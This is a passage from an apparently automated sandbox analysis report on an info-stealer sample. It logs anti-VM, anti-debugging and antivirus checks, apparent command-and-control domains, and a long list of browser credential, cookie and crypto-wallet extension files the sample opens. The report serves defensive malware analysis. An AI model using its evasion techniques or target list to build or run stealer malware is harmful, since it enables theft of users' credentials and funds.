                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0B9A second address: 56C0B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0B9E second address: 56C0BA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0BA2 second address: 56C0BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5D692C6EEDh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0BBA second address: 56C0BCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D68C8BFFCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0BCA second address: 56C0BCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0BCE second address: 56C0BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop ebx 0x0000000e mov esi, 4D972A2Bh 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSpecial instruction interceptor: First address: FF7C49 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSpecial instruction interceptor: First address: 11AAF67 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSpecial instruction interceptor: First address: 122A6AB instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\FjFeChttqA.exe TID: 1476Thread sleep time: -150000s >= -30000s
                Source: C:\Users\user\Desktop\FjFeChttqA.exe TID: 1352Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\FjFeChttqA.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: FjFeChttqA.exe, 00000000.00000002.2263066813.0000000001179000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: FjFeChttqA.exe, FjFeChttqA.exe, 00000000.00000003.2180512483.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000002.2264288867.0000000001887000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000002.2264382430.00000000018B9000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2201681034.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262167360.0000000001887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060D2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: YNVMware
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
                Source: FjFeChttqA.exe, 00000000.00000002.2263066813.0000000001179000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\FjFeChttqA.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: SICE
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | Process queried: DebugPort

                HIPS / PFW / Operating System Protection Evasion

                Source: FjFeChttqA.exe, 00000000.00000003.2057854573.0000000005530000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: steppriflej.xyz
                Source: FjFeChttqA.exe, 00000000.00000003.2057854573.0000000005530000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: sendypaster.xyz
                Source: FjFeChttqA.exe, 00000000.00000003.2057854573.0000000005530000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: cuddlyready.xyz
                Source: FjFeChttqA.exe, 00000000.00000002.2263299094.00000000011C1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: jProgram Manager
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: FjFeChttqA.exe, 00000000.00000003.2205898368.00000000060AE000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2218952789.00000000060AE000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2201681034.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match | File source: Process Memory Space: FjFeChttqA.exe PID: 5568, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: FjFeChttqA.exe | String found in binary or memory: Wallets/Electrum
                Source: FjFeChttqA.exe | String found in binary or memory: Wallets/ElectronCash
                Source: FjFeChttqA.exe | String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: FjFeChttqA.exe | String found in binary or memory: window-state.json
                Source: FjFeChttqA.exe | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: FjFeChttqA.exe | String found in binary or memory: Wallets/Ethereum
                Source: FjFeChttqA.exe | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: FjFeChttqA.exe, 00000000.00000003.2180485031.000000000191D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
